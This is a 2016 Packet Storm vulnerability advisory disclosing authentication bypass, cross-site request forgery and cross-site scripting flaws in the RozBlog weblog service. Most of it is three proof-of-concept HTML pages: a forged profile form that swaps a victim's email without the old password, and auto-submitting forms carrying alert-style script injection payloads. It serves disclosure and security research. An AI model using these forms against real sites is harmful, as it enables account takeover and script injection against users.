RozBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

2016-02-24T00:00:00
ID PACKETSTORM:135922
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-02-24T00:00:00

Description

                                        
                                            `Document Title:  
===============  
RozBlog Weblog Service - Authentication Bypass / Cross Site Request  
Forgery / Cross Site Scripting  
  
  
References (Source):  
====================  
http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt  
  
  
Release Date:  
=============  
2016-02-23  
  
  
Product & Service Introduction:  
===============================  
Roseblog is one of the most famous blogging services, it has many  
special features that indicate you an interesting experience of  
blogging.  
  
  
Vulnerability Type:  
=========================  
Authentication Bypass  
Cross Site Request Forgery  
Cross Site Scripting  
  
Vulnerability Details:  
==============================  
I discovered an authentication bypass(change Email) vulnerability and  
a client-side cross site request forgery web  
vulnerability and a cross site scripting vulnerability and in  
RozBlog.com (Weblog Service).  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
  
  
Proof of Concept (PoC):  
=======================  
-- Cross Site Request Forgery & Authentication Bypass --  
  
-- PoC 1 --  
  
-- To edit the e-mail users must first enter the old password on other  
page, but with this exploit no longer requires it and bypass that. --  
  
<html>  
<head>  
<title>Authentication Bypass - Csrf</title>  
</head>  
<body>  
<form action="http://news.rozblog.com/Edit_Profile" method="post">  
<input type="text" name="email" value="hacker@mail.com" >  
<input type="text" name="name" value="Ehsan">  
<input type="text" name="age" value="10">  
<input type="text" name="site" value="http://ehsansec.ir/">  
<input type="text" name="country" value="Country">  
<input type="text" name="city" value="IRan">  
<input type="text" name="about" value="About User">  
<input type="text" name="yahoo" value="Yahoo Id">  
<input type="text" name="password" value="123@abc">  
<input type="submit" name="edit_profile" value="Attak">  
</form>  
</body>  
</html>  
  
-- PoC 2 --  
  
<html>  
<head>  
<title>XSS - Csrf</title>  
</head>  
<body onload="document.contactfrm.submit()">  
<form action="http://news.rozblog.com/Forum/Send/Message/"  
name="contactfrm" method="post">  
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>  
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>  
<input type="text" name="message" value='"></textarea><img src=x  
onerror=alert(3)>'>  
</form>  
</body>  
</html>  
  
-- PoC 3 --  
  
-- Cross Site Scripting --  
  
-- For action attribute enter address of weblog or one of rozblog.com domains --  
  
<html>  
<head>  
<title>Cross Site Scripting</title>  
</head>  
<body onload="document.info.submit()">  
<form action='http://rozblog.com/View_Temp' method='POST'  
name='info'>  
<input name="c" id="c" value="2" type="hidden">  
<input name='themecode' value="<script>alert('Ehsan')</script>">  
</form>  
</body>  
</html>  
  
  
Author:  
==================  
Ehsan Hosseini  
http://ehsansec.ir/  
  
SPX tnx to:  
===========  
Bl4ck_mohajem  
Alireza  
  
  
Contact:  
========  
hehsan979@gmail.com  
info@ehsansec.ir  
`